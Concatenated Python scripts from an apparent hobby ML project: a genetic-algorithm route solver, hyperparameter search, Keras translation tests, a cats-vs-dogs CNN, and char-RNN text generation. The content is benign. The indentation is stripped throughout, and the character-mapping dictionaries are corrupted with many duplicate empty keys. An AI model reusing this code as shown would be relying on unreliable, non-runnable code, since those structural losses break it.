def initial_population(popsize, cities):
return [ create_route(cities) for i in range(popsize) ]
def sort_routes(population):
"""This function calculates the fitness of each route in population
And returns a population sorted by its fitness in descending order"""
result = [ (i, Fitness(route).fitness()) for i, route in enumerate(population) ]
return sorted(result, key=operator.itemgetter(1), reverse=True)
def selection(population, elite_size):
sorted_pop = sort_routes(population)
df = pd.DataFrame(np.array(sorted_pop), columns=["Index", "Fitness"])
# calculates the cumulative sum
# example:
# [5, 6, 7] => [5, 11, 18]
df['cum_sum'] = df['Fitness'].cumsum()
# calculates the cumulative percentage
# example:
# [5, 6, 7] => [5/18, 11/18, 18/18]
# [5, 6, 7] => [27.77%, 61.11%, 100%]
df['cum_perc'] = 100 * df['cum_sum'] / df['Fitness'].sum()
result = [ sorted_pop[i][0] for i in range(elite_size) ]
for i in range(len(sorted_pop) - elite_size):
pick = random.random() * 100
for i in range(len(sorted_pop)):
if pick <= df['cum_perc'][i]:
result.append(sorted_pop[i][0])
break
return [ population[index] for index in result ]
def breed(parent1, parent2):
child1, child2 = [], []
gene_A = random.randint(0, len(parent1))
gene_B = random.randint(0, len(parent2))
start_gene = min(gene_A, gene_B)
end_gene = max(gene_A, gene_B)
for i in range(start_gene, end_gene):
child1.append(parent1[i])
child2 = [ item for item in parent2 if item not in child1 ]
return child1 + child2
def breed_population(selection, elite_size):
pool = random.sample(selection, len(selection))
# for i in range(elite_size):
# children.append(selection[i])
children = [selection[i] for i in range(elite_size)]
children.extend([breed(pool[i], pool[len(selection)-i-1]) for i in range(len(selection) - elite_size)])
# for i in range(len(selection) - elite_size):
# child = breed(pool[i], pool[len(selection)-i-1])
# children.append(child)
return children
def mutate(route, mutation_rate):
route_length = len(route)
for swapped in range(route_length):
if(random.random() < mutation_rate):
swap_with = random.randint(0, route_length-1)
route[swapped], route[swap_with] = route[swap_with], route[swapped]
return route
def mutate_population(population, mutation_rate):
return [ mutate(route, mutation_rate) for route in population ]
def next_gen(current_gen, elite_size, mutation_rate):
select = selection(population=current_gen, elite_size=elite_size)
children = breed_population(selection=select, elite_size=elite_size)
return mutate_population(children, mutation_rate)
def genetic_algorithm(cities, popsize, elite_size, mutation_rate, generations, plot=True, prn=True):
global route
global progress
population = initial_population(popsize=popsize, cities=cities)
if plot:
animate_progress()
sorted_pop = sort_routes(population)
initial_route = population[sorted_pop[0][0]]
distance = 1 / sorted_pop[0][1]
if prn:
print(f"Initial distance: {distance}")
try:
if plot:
progress = [ distance ]
for i in range(generations):
population = next_gen(population, elite_size, mutation_rate)
sorted_pop = sort_routes(population)
distance = 1 / sorted_pop[0][1]
progress.append(distance)
if prn:
print(f"[Generation:{i}] Current distance: {distance}")
route = population[sorted_pop[0][0]]
else:
for i in range(generations):
population = next_gen(population, elite_size, mutation_rate)
distance = 1 / sort_routes(population)[0][1]
if prn:
print(f"[Generation:{i}] Current distance: {distance}")
except KeyboardInterrupt:
pass
stop_animation.set()
final_route_index = sort_routes(population)[0][0]
final_route = population[final_route_index]
if prn:
print("Final route:", final_route)
return initial_route, final_route, distance
if __name__ == "__main__":
cities = generate_cities(25)
initial_route, final_route, distance = genetic_algorithm(cities=cities, popsize=120, elite_size=19, mutation_rate=0.0019, generations=1800)
# plot_routes(initial_route, final_route)
import numpy
import matplotlib.pyplot as plt
import cv2
from PIL import Image
from multiprocessing import Process
def fig2img ( fig ):
"""
brief Convert a Matplotlib figure to a PIL Image in RGBA format and return it
param fig a matplotlib figure
return a Python Imaging Library ( PIL ) image
"""
# put the figure pixmap into a numpy array
buf = fig2data ( fig )
w, h, d = buf.shape
return Image.frombytes( "RGB", ( w ,h ), buf.tostring( ) )
def fig2data ( fig ):
"""
brief Convert a Matplotlib figure to a 4D numpy array with RGBA channels and return it
param fig a matplotlib figure
return a numpy 3D array of RGBA values
"""
# draw the renderer
fig.canvas.draw ( )
# Get the RGBA buffer from the figure
w,h = fig.canvas.get_width_height()
buf = numpy.fromstring ( fig.canvas.tostring_rgb(), dtype=numpy.uint8 )
buf.shape = ( w, h,3 )
# canvas.tostring_argb give pixmap in ARGB mode. Roll the ALPHA channel to have it in RGBA mode
buf = numpy.roll ( buf, 3, axis = 2 )
return buf
if __name__ == "__main__":
pass
# figure = plt.figure()
# plt.plot([3, 5, 9], [3, 19, 23])
# img = fig2img(figure)
# img.show()
# while True:
# frame = numpy.array(img)
# # Convert RGB to BGR
# frame = frame[:, :, ::-1].copy()
# print(frame)
# cv2.imshow("test", frame)
# if cv2.waitKey(0) == ord('q'):
# break
# cv2.destroyAllWindows()
def realtime_plot(route):
figure = plt.figure(figsize=(14, 8))
plt.title("Real time routes")
for city in route:
plt.scatter(city.x, city.y, s=70, c='b')
plt.plot([ city.x for city in route ], [city.y for city in route], c='r')
img = numpy.array(fig2img(figure))
cv2.imshow("test", img)
if cv2.waitKey(1) == ord('q'):
cv2.destroyAllWindows()
plt.close(figure)
from genetic import genetic_algorithm, generate_cities, City
import operator
def load_cities():
return [ City(city[0], city[1]) for city in [(169, 20), (103, 24), (41, 9), (177, 76), (138, 173), (163, 108), (93, 34), (200, 84), (19, 184), (117, 176), (153, 30), (140, 29), (38, 108), (89, 183), (18, 4), (174, 38), (109, 169), (93, 23), (156, 10), (171, 27), (164, 91), (109, 194), (90, 169), (115, 37), (177, 93), (169, 20)] ]
def train():
cities = load_cities()
generations = 1000
popsizes = [60, 100, 140, 180]
elitesizes = [5, 15, 25, 35, 45]
mutation_rates = [0.0001, 0.0005, 0.001, 0.005, 0.01]
total_iterations = len(popsizes) * len(elitesizes) * len(mutation_rates)
iteration = 0
tries = {}
for popsize in popsizes:
for elite_size in elitesizes:
for mutation_rate in mutation_rates:
iteration += 1
init_route, final_route, distance = genetic_algorithm( cities=cities,
popsize=popsize,
elite_size=elite_size,
mutation_rate=mutation_rate,
generations=generations,
plot=False,
prn=False)
progress = iteration / total_iterations
percentage = progress * 100
print(f"[{percentage:5.2f}%] [Iteration:{iteration:3}/{total_iterations:3}] [popsize={popsize:3} elite_size={elite_size:2} mutation_rate={mutation_rate:7}] Distance: {distance:4}")
tries[(popsize, elite_size, mutation_rate)] = distance
min_gen = min(tries.values())
reversed_tries = { v:k for k, v in tries.items() }
best_combination = reversed_tries[min_gen]
print("Best combination:", best_combination)
if __name__ == "__main__":
train()
# best parameters
# popsize elitesize mutation_rateqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq
# 90 25 0.0001
# 110 10 0.001
# 130 10 0.005
# 130 20 0.001
# 150 25 0.001
import os
def load_data(path):
"""
Load dataset
"""
input_file = os.path.join(path)
with open(input_file, "r") as f:
data = f.read()
return data.split('\n')
import numpy as np
from keras.losses import sparse_categorical_crossentropy
from keras.models import Sequential
from keras.preprocessing.text import Tokenizer
from keras.utils import to_categorical
def _test_model(model, input_shape, output_sequence_length, french_vocab_size):
if isinstance(model, Sequential):
model = model.model
assert model.input_shape == (None, *input_shape[1:]),\
'Wrong input shape. Found input shape {} using parameter input_shape={}'.format(model.input_shape, input_shape)
assert model.output_shape == (None, output_sequence_length, french_vocab_size),\
'Wrong output shape. Found output shape {} using parameters output_sequence_length={} and french_vocab_size={}'\
.format(model.output_shape, output_sequence_length, french_vocab_size)
assert len(model.loss_functions) > 0,\
'No loss function set. Apply the compile function to the model.'
assert sparse_categorical_crossentropy in model.loss_functions,\
'Not using sparse_categorical_crossentropy function for loss.'
def test_tokenize(tokenize):
sentences = [
'The quick brown fox jumps over the lazy dog .',
'By Jove , my quick study of lexicography won a prize .',
'This is a short sentence .']
tokenized_sentences, tokenizer = tokenize(sentences)
assert tokenized_sentences == tokenizer.texts_to_sequences(sentences),\
'Tokenizer returned and doesn\'t generate the same sentences as the tokenized sentences returned. '
def test_pad(pad):
tokens = [
[i for i in range(4)],
[i for i in range(6)],
[i for i in range(3)]]
padded_tokens = pad(tokens)
padding_id = padded_tokens[0][-1]
true_padded_tokens = np.array([
[i for i in range(4)] + [padding_id]*2,
[i for i in range(6)],
[i for i in range(3)] + [padding_id]*3])
assert isinstance(padded_tokens, np.ndarray),\
'Pad returned the wrong type. Found {} type, expected numpy array type.'
assert np.all(padded_tokens == true_padded_tokens), 'Pad returned the wrong results.'
padded_tokens_using_length = pad(tokens, 9)
assert np.all(padded_tokens_using_length == np.concatenate((true_padded_tokens, np.full((3, 3), padding_id)), axis=1)),\
'Using length argument return incorrect results'
def test_simple_model(simple_model):
input_shape = (137861, 21, 1)
output_sequence_length = 21
english_vocab_size = 199
french_vocab_size = 344
model = simple_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size)
_test_model(model, input_shape, output_sequence_length, french_vocab_size)
def test_embed_model(embed_model):
input_shape = (137861, 21)
output_sequence_length = 21
english_vocab_size = 199
french_vocab_size = 344
model = embed_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size)
_test_model(model, input_shape, output_sequence_length, french_vocab_size)
def test_encdec_model(encdec_model):
input_shape = (137861, 15, 1)
output_sequence_length = 21
english_vocab_size = 199
french_vocab_size = 344
model = encdec_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size)
_test_model(model, input_shape, output_sequence_length, french_vocab_size)
def test_bd_model(bd_model):
input_shape = (137861, 21, 1)
output_sequence_length = 21
english_vocab_size = 199
french_vocab_size = 344
model = bd_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size)
_test_model(model, input_shape, output_sequence_length, french_vocab_size)
def test_model_final(model_final):
input_shape = (137861, 15)
output_sequence_length = 21
english_vocab_size = 199
french_vocab_size = 344
model = model_final(input_shape, output_sequence_length, english_vocab_size, french_vocab_size)
_test_model(model, input_shape, output_sequence_length, french_vocab_size)
CATEGORIES = ["Dog", "Cat"]
IMG_SIZE = 100
DATADIR = r"C:\Users\STRIX\Desktop\CatnDog\PetImages"
TRAINING_DIR = r"E:\datasets\CatnDog\Training"
TESTING_DIR = r"E:\datasets\CatnDog\Testing"
import cv2
import tensorflow as tf
import os
import numpy as np
import random
from settings import *
from tqdm import tqdm
# CAT_PATH = r"C:\Users\STRIX\Desktop\CatnDog\Testing\Cat"
# DOG_PATH = r"C:\Users\STRIX\Desktop\CatnDog\Testing\Dog"
MODEL = "Cats-vs-dogs-new-6-0.90-CNN"
def prepare_image(path):
image = cv2.imread(path, cv2.IMREAD_GRAYSCALE)
image = cv2.resize(image, (IMG_SIZE, IMG_SIZE))
return image
# img = cv2.imread(path, cv2.IMREAD_GRAYSCALE)
# img = cv2.resize(img, (IMG_SIZE, IMG_SIZE))
# return img.reshape(-1, IMG_SIZE, IMG_SIZE, 1)
def load_model():
return tf.keras.models.load_model(f"{MODEL}.model")
def predict(img):
prediction = model.predict([prepare_image(img)])[0][0]
return int(prediction)
if __name__ == "__main__":
model = load_model()
x_test, y_test = [], []
for code, category in enumerate(CATEGORIES):
path = os.path.join(TESTING_DIR, category)
for img in tqdm(os.listdir(path), "Loading images:"):
# result = predict(os.path.join(path, img))
# if result == code:
# correct += 1
# total += 1
# testing_data.append((os.path.join(path, img), code))
x_test.append(prepare_image(os.path.join(path, img)))
y_test.append(code)
x_test = np.array(x_test).reshape(-1, IMG_SIZE, IMG_SIZE, 1)
# random.shuffle(testing_data)
# total = 0
# correct = 0
# for img, code in testing_data:
# result = predict(img)
# if result == code:
# correct += 1
# total += 1
# accuracy = (correct/total) * 100
# print(f"{correct}/{total} Total Accuracy: {accuracy:.2f}%")
# print(x_test)
# print("="*50)
# print(y_test)
print(model.evaluate([x_test], y_test))
print(model.metrics_names)
import numpy as np
import matplotlib.pyplot as plt
import cv2
import os
# import cv2
from tqdm import tqdm
import random
from settings import *
# for the first time only
# for category in CATEGORIES:
# directory = os.path.join(TRAINING_DIR, category)
# os.makedirs(directory)
# # for the first time only
# for category in CATEGORIES:
# directory = os.path.join(TESTING_DIR, category)
# os.makedirs(directory)
# Total images for each category: 12501 image (total 25002)
# def create_data():
# for code, category in enumerate(CATEGORIES):
# path = os.path.join(DATADIR, category)
# for counter, img in enumerate(tqdm(os.listdir(path)), start=1):
# try:
# # absolute path of image
# image = os.path.join(path, img)
# image = cv2.imread(image, cv2.IMREAD_GRAYSCALE)
# image = cv2.resize(image, (IMG_SIZE, IMG_SIZE))
# if counter < 300:
# # testing image
# img = os.path.join(TESTING_DIR, category, img)
# else:
# # training image
# img = os.path.join(TRAINING_DIR, category, img)
# cv2.imwrite(img, image)
# except:
# pass
def load_data(path):
data = []
for code, category in enumerate(CATEGORIES):
p = os.path.join(path, category)
for img in tqdm(os.listdir(p), desc=f"Loading {category} data: "):
img = os.path.join(p, img)
img = cv2.imread(img, cv2.IMREAD_GRAYSCALE)
data.append((img, code))
return data
def load_training_data():
return load_data(TRAINING_DIR)
def load_testing_data():
return load_data(TESTING_DIR)
# # load data
# training_data = load_training_data()
# # # shuffle data
# random.shuffle(training_data)
# X, y = [], []
# for features, label in tqdm(training_data, desc="Splitting the data: "):
# X.append(features)
# y.append(label)
# X = np.array(X).reshape(-1, IMG_SIZE, IMG_SIZE, 1)
# # pickling (images,labels)
# print("Pickling data...")
import pickle
# with open("X.pickle", 'wb') as pickle_out:
# pickle.dump(X, pickle_out)
# with open("y.pickle", 'wb') as pickle_out:
# pickle.dump(y, pickle_out)
def load():
return np.array(pickle.load(open("X.pickle", 'rb'))), pickle.load(open("y.pickle", 'rb'))
print("Loading data...")
X, y = load()
X = X/255 # to make colors from 0 to 1
print("Shape of X:", X.shape)
import tensorflow
from tensorflow.keras.datasets import cifar10
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.callbacks import ModelCheckpoint
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Dropout, Activation, Flatten
from tensorflow.keras.layers import Conv2D, MaxPooling2D
# from tensorflow.keras.callbacks import TensorBoard
print("Imported tensorflow, building model...")
NAME = "Cats-vs-dogs-new-9-{val_acc:.2f}-CNN"
checkpoint = ModelCheckpoint(filepath=f"{NAME}.model", save_best_only=True, verbose=1)
# 3 conv, 64 nodes per layer, 0 dense
model = Sequential()
model.add(Conv2D(32, (2, 2), input_shape=X.shape[1:]))
model.add(Activation('relu'))
model.add(Conv2D(32, (2, 2)))
model.add(Dropout(0.1))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, (2, 2)))
model.add(Activation('relu'))
model.add(Conv2D(64, (2, 2)))
model.add(Dropout(0.1))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(96, (2, 2)))
model.add(Activation('relu'))
model.add(Conv2D(96, (2, 2)))
model.add(Dropout(0.1))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(128, (2, 2)))
model.add(Activation('relu'))
model.add(Conv2D(128, (2, 2)))
model.add(Dropout(0.1))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dense(500, activation="relu"))
model.add(Flatten()) # this converts our 3D feature maps to 1D feature vectors
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.summary()
print("Compiling model ...")
# tensorboard = TensorBoard(log_dir=f"logs/{NAME}")
model.compile(loss="binary_crossentropy",
optimizer="rmsprop",
metrics=['accuracy'])
print("Training...")
model.fit(X, y, batch_size=64, epochs=30, validation_split=0.2, callbacks=[checkpoint])
### Hyper Parameters ###
batch_size = 256 # Sequences per batch
num_steps = 70 # Number of sequence steps per batch
lstm_size = 256 # Size of hidden layers in LSTMs
num_layers = 2 # Number of LSTM layers
learning_rate = 0.003 # Learning rate
keep_prob = 0.3 # Dropout keep probability
epochs = 20
# Print losses every N interations
print_every_n = 100
# Save every N iterations
save_every_n = 500
NUM_THREADS = 12
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=1,
inter_op_parallelism_threads=1,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
import train_chars
import numpy as np
import keyboard
char2int_target = {'\t': 0, '\n': 1, '\x0c': 2, ' ': 3, '!': 4, '"': 5, '#': 6, '': 7, '%': 8, '&': 9, "'": 10, '(': 11, ')': 12, '*': 13, '+': 14, ',': 15, '-': 16, '.': 17,
'/': 18, '0': 19, '1': 20, '2': 21, '3': 22, '4': 23, '5': 24, '6': 25, '7': 26, '8': 27, '9': 28, ':': 29, '': 30, '<': 31, '=': 32, '>': 33, '?': 34, '':
35, 'A': 36, 'B': 37, 'C': 38, 'D': 39, 'E': 40, 'F': 41, 'G': 42, 'H': 43, 'I': 44, 'J': 45, 'K': 46, 'L': 47, 'M': 48, 'N': 49, 'O': 50, 'P': 51, 'Q': 52, 'R': 53, 'S': 54, 'T': 55, 'U': 56, 'V': 57, 'W': 58, 'X': 59, 'Y': 60, 'Z': 61, '[': 62, '\\': 63, ']': 64, '^': 65, '_': 66, '': 67, 'a': 68, 'b': 69, 'c':
70, 'd': 71, 'e': 72, 'f': 73, 'g': 74, 'h': 75, 'i': 76, 'j': 77, 'k': 78, 'l': 79, 'm': 80, 'n': 81, 'o': 82, 'p': 83, 'q': 84, 'r': 85, 's': 86, 't': 87, 'u': 88, 'v': 89, 'w': 90, 'x': 91, 'y': 92, 'z': 93, '{': 94, '|': 95, '}': 96, '': 97, '': 98, '': 99, '': 100, '': 101, '': 102, '': 103, '': 104, '': 105, '\xad': 106, '': 107, '': 108, '': 109, '': 110, '': 111, '': 112, '': 113, '': 114, '': 115, '': 116, '': 117, '': 118, '': 119, '': 120, '': 121, '': 122, '': 123, '': 124, '': 125, '': 126, '': 127, '': 128, '': 129, '': 130, '': 131, '': 132, '': 133, '': 134, '': 135, '': 136, '': 137, '': 138, '': 139, '': 140, '': 141, '': 142, '': 143, '': 144, '': 145, '': 146, '': 147, '': 148, '': 149, '': 150, '': 151, '': 152, '': 153, '': 154, '': 155, '': 156, '': 157, '': 158, '': 159, '': 160, '': 161, '': 162, '': 163, '': 164, '': 165, '': 166, '': 167,
'': 168, '': 169, '': 170, '': 171, '': 172, '': 173, '': 174, '': 175, '': 176, '': 177, '': 178, '': 179, '': 180, '': 181, '': 182, '': 183, '': 184, '': 185, '': 186, '': 187, '': 188, '': 189, '': 190, '': 191, '': 192}
model = train_chars.CharRNN(len(char2int_target), lstm_size=train_chars.lstm_size, sampling=True)
saver = train_chars.tf.train.Saver()
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
def write_sample(checkpoint, lstm_size, vocab_size, char2int, int2char, prime="import"):
# samples = [c for c in prime]
with train_chars.tf.Session() as sess:
saver.restore(sess, checkpoint)
new_state = sess.run(model.initial_state)
for c in prime:
x = np.zeros((1, 1))
x[0,0] = char2int[c]
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
# print("Preds:", preds)
c = pick_top_n(preds, vocab_size)
char = int2char[c]
keyboard.write(char)
time.sleep(0.01)
# samples.append(char)
while True:
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, vocab_size)
char = int2char[c]
keyboard.write(char)
time.sleep(0.01)
# samples.append(char)
# return ''.join(samples)ss", "as"
if __name__ == "__main__":
# checkpoint = train_chars.tf.train_chars.latest_checkpoint("checkpoints")
# print(checkpoint)
checkpoint = "checkpoints/i6291_l256.ckpt"
print()
f = open("generates/python.txt", "a", encoding="utf8")
int2char_target = { v:k for k, v in char2int_target.items() }
import time
time.sleep(2)
write_sample(checkpoint, train_chars.lstm_size, len(char2int_target), char2int_target, int2char_target, prime="#"*100)
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
import train_chars
import numpy as np
char2int_target = {'\t': 0, '\n': 1, '\x0c': 2, ' ': 3, '!': 4, '"': 5, '#': 6, '': 7, '%': 8, '&': 9, "'": 10, '(': 11, ')': 12, '*': 13, '+': 14, ',': 15, '-': 16, '.': 17,
'/': 18, '0': 19, '1': 20, '2': 21, '3': 22, '4': 23, '5': 24, '6': 25, '7': 26, '8': 27, '9': 28, ':': 29, '': 30, '<': 31, '=': 32, '>': 33, '?': 34, '':
35, 'A': 36, 'B': 37, 'C': 38, 'D': 39, 'E': 40, 'F': 41, 'G': 42, 'H': 43, 'I': 44, 'J': 45, 'K': 46, 'L': 47, 'M': 48, 'N': 49, 'O': 50, 'P': 51, 'Q': 52, 'R': 53, 'S': 54, 'T': 55, 'U': 56, 'V': 57, 'W': 58, 'X': 59, 'Y': 60, 'Z': 61, '[': 62, '\\': 63, ']': 64, '^': 65, '_': 66, '': 67, 'a': 68, 'b': 69, 'c':
70, 'd': 71, 'e': 72, 'f': 73, 'g': 74, 'h': 75, 'i': 76, 'j': 77, 'k': 78, 'l': 79, 'm': 80, 'n': 81, 'o': 82, 'p': 83, 'q': 84, 'r': 85, 's': 86, 't': 87, 'u': 88, 'v': 89, 'w': 90, 'x': 91, 'y': 92, 'z': 93, '{': 94, '|': 95, '}': 96, '': 97, '': 98, '': 99, '': 100, '': 101, '': 102, '': 103, '': 104, '': 105, '\xad': 106, '': 107, '': 108, '': 109, '': 110, '': 111, '': 112, '': 113, '': 114, '': 115, '': 116, '': 117, '': 118, '': 119, '': 120, '': 121, '': 122, '': 123, '': 124, '': 125, '': 126, '': 127, '': 128, '': 129, '': 130, '': 131, '': 132, '': 133, '': 134, '': 135, '': 136, '': 137, '': 138, '': 139, '': 140, '': 141, '': 142, '': 143, '': 144, '': 145, '': 146, '': 147, '': 148, '': 149, '': 150, '': 151, '': 152, '': 153, '': 154, '': 155, '': 156, '': 157, '': 158, '': 159, '': 160, '': 161, '': 162, '': 163, '': 164, '': 165, '': 166, '': 167,
'': 168, '': 169, '': 170, '': 171, '': 172, '': 173, '': 174, '': 175, '': 176, '': 177, '': 178, '': 179, '': 180, '': 181, '': 182, '': 183, '': 184, '': 185, '': 186, '': 187, '': 188, '': 189, '': 190, '': 191, '': 192}
model = train_chars.CharRNN(len(char2int_target), lstm_size=train_chars.lstm_size, sampling=True)
saver = train_chars.tf.train.Saver()
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
def sample(checkpoint, n_samples, lstm_size, vocab_size, char2int, int2char, prime="The"):
samples = [c for c in prime]
with train_chars.tf.Session() as sess:
saver.restore(sess, checkpoint)
new_state = sess.run(model.initial_state)
for c in prime:
x = np.zeros((1, 1))
x[0,0] = char2int[c]
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
# print("Preds:", preds)
c = pick_top_n(preds, vocab_size)
samples.append(int2char[c])
for i in range(n_samples):
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, vocab_size)
char = int2char[c]
samples.append(char)
# if i == n_samples - 1 and char != " " and char != ".":
# if i == n_samples - 1 and char != " ":
# # while char != "." and char != " ":
# while char != " ":
# x[0,0] = c
# feed = {model.inputs: x,
# model.keep_prob: 1.,
# model.initial_state: new_state}
# preds, new_state = sess.run([model.prediction, model.final_state],
# feed_dict=feed)
# c = pick_top_n(preds, vocab_size)
# char = int2char[c]
# samples.append(char)
return ''.join(samples)
if __name__ == "__main__":
# checkpoint = train_chars.tf.train_chars.latest_checkpoint("checkpoints")
# print(checkpoint)
checkpoint = "checkpoints/i6291_l256.ckpt"
print()
f = open("generates/python.txt", "a", encoding="utf8")
int2char_target = { v:k for k, v in char2int_target.items() }
for prime in ["#"*100]:
samp = sample(checkpoint, 5000, train_chars.lstm_size, len(char2int_target), char2int_target, int2char_target, prime=prime)
print(samp, file=f)
print(samp)
print("="*50)
print("="*50, file=f)
import numpy as np
import train_words
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
def sample(checkpoint, n_samples, lstm_size, vocab_size, prime=["The"]):
samples = [c for c in prime]
model = train_words.CharRNN(len(train_words.vocab), lstm_size=lstm_size, sampling=True)
saver = train_words.tf.train.Saver()
with train_words.tf.Session() as sess:
saver.restore(sess, checkpoint)
new_state = sess.run(model.initial_state)
for c in prime:
x = np.zeros((1, 1))
x[0,0] = train_words.vocab_to_int[c]
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, len(train_words.vocab))
samples.append(train_words.int_to_vocab[c])
for i in range(n_samples):
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, len(train_words.vocab))
char = train_words.int_to_vocab[c]
samples.append(char)
return ' '.join(samples)
if __name__ == "__main__":
# checkpoint = train_words.tf.train_words.latest_checkpoint("checkpoints")
# print(checkpoint)
checkpoint = f"{train_words.CHECKPOINT}/i8000_l128.ckpt"
samp = sample(checkpoint, 400, train_words.lstm_size, len(train_words.vocab), prime=["the", "very"])
print(samp)
import tensorflow as tf
import numpy as np
def get_batches(arr, batch_size, n_steps):
'''Create a generator that returns batches of size
batch_size x n_steps from arr.
Arguments
---------
arr: Array you want to make batches from
batch_size: Batch size, the number of sequences per batch
n_steps: Number of sequence steps per batch
'''
chars_per_batch = batch_size * n_steps
n_batches = len(arr) // chars_per_batch
arr = arr[:chars_per_batch * n_batches]
arr = arr.reshape((batch_size, -1))
for n in range(0, arr.shape[1], n_steps):
x = arr[:, n: n+n_steps]
y_temp = arr[:, n+1:n+n_steps+1]
y = np.zeros(x.shape, dtype=y_temp.dtype)
y[:, :y_temp.shape[1]] = y_temp
yield x, y
# batches = get_batches(encoded, 10, 50)
# x, y = next(batches)
def build_inputs(batch_size, num_steps):
''' Define placeholders for inputs, targets, and dropout
Arguments
---------
batch_size: Batch size, number of sequences per batch
num_steps: Number of sequence steps in a batch
'''
# Declare placeholders we'll feed into the graph
inputs = tf.placeholder(tf.int32, shape=(batch_size, num_steps), name="inputs")
targets = tf.placeholder(tf.int32, shape=(batch_size, num_steps), name="targets")
# Keep probability placeholder for drop out layers
keep_prob = tf.placeholder(tf.float32, name="keep_prob")
return inputs, targets, keep_prob
def build_lstm(lstm_size, num_layers, batch_size, keep_prob):
''' Build LSTM cell.
Arguments
---------
lstm_size: Size of the hidden layers in the LSTM cells
num_layers: Number of LSTM layers
batch_size: Batch size
keep_prob: Scalar tensor (tf.placeholder) for the dropout keep probability
'''
### Build the LSTM Cell
def build_cell():
# Use a basic LSTM cell
lstm = tf.contrib.rnn.BasicLSTMCell(lstm_size)
# Add dropout to the cell outputs
drop_lstm = tf.contrib.rnn.DropoutWrapper(lstm, output_keep_prob=keep_prob)
return drop_lstm
# Stack up multiple LSTM layers, for deep learning
# build num_layers layers of lstm_size LSTM Cells
cell = tf.contrib.rnn.MultiRNNCell([build_cell() for _ in range(num_layers)])
initial_state = cell.zero_state(batch_size, tf.float32)
return cell, initial_state
def build_output(lstm_output, in_size, out_size):
''' Build a softmax layer, return the softmax output and logits.
Arguments
---------
lstm_output: List of output tensors from the LSTM layer
in_size: Size of the input tensor, for example, size of the LSTM cells
out_size: Size of this softmax layer
'''
# Reshape output so it's a bunch of rows, one row for each step for each sequence.
# Concatenate lstm_output over axis 1 (the columns)
seq_output = tf.concat(lstm_output, axis=1)
# Reshape seq_output to a 2D tensor with lstm_size columns
x = tf.reshape(seq_output, (-1, in_size))
# Connect the RNN outputs to a softmax layer
with tf.variable_scope('softmax'):
# Create the weight and bias variables here
softmax_w = tf.Variable(tf.truncated_normal((in_size, out_size), stddev=0.1))
softmax_b = tf.Variable(tf.zeros(out_size))
# Since output is a bunch of rows of RNN cell outputs, logits will be a bunch
# of rows of logit outputs, one for each step and sequence
logits = tf.matmul(x, softmax_w) + softmax_b
# Use softmax to get the probabilities for predicted characters
out = tf.nn.softmax(logits, name="predictions")
return out, logits
def build_loss(logits, targets, num_classes):
''' Calculate the loss from the logits and the targets.
Arguments
---------
logits: Logits from final fully connected layer
targets: Targets for supervised learning
num_classes: Number of classes in targets
'''
# One-hot encode targets and reshape to match logits, one row per sequence per step
y_one_hot = tf.one_hot(targets, num_classes)
y_reshaped = tf.reshape(y_one_hot, logits.get_shape())
# Softmax cross entropy loss
loss = tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=y_reshaped)
loss = tf.reduce_mean(loss)
return loss
def build_optimizer(loss, learning_rate, grad_clip):
''' Build optmizer for training, using gradient clipping.
Arguments:
loss: Network loss
learning_rate: Learning rate for optimizer
grad_clip: threshold for preventing gradient exploding
'''
# Optimizer for training, using gradient clipping to control exploding gradients
tvars = tf.trainable_variables()
grads, _ = tf.clip_by_global_norm(tf.gradients(loss, tvars), grad_clip)
train_op = tf.train.AdamOptimizer(learning_rate)
optimizer = train_op.apply_gradients(zip(grads, tvars))
return optimizer
class CharRNN:
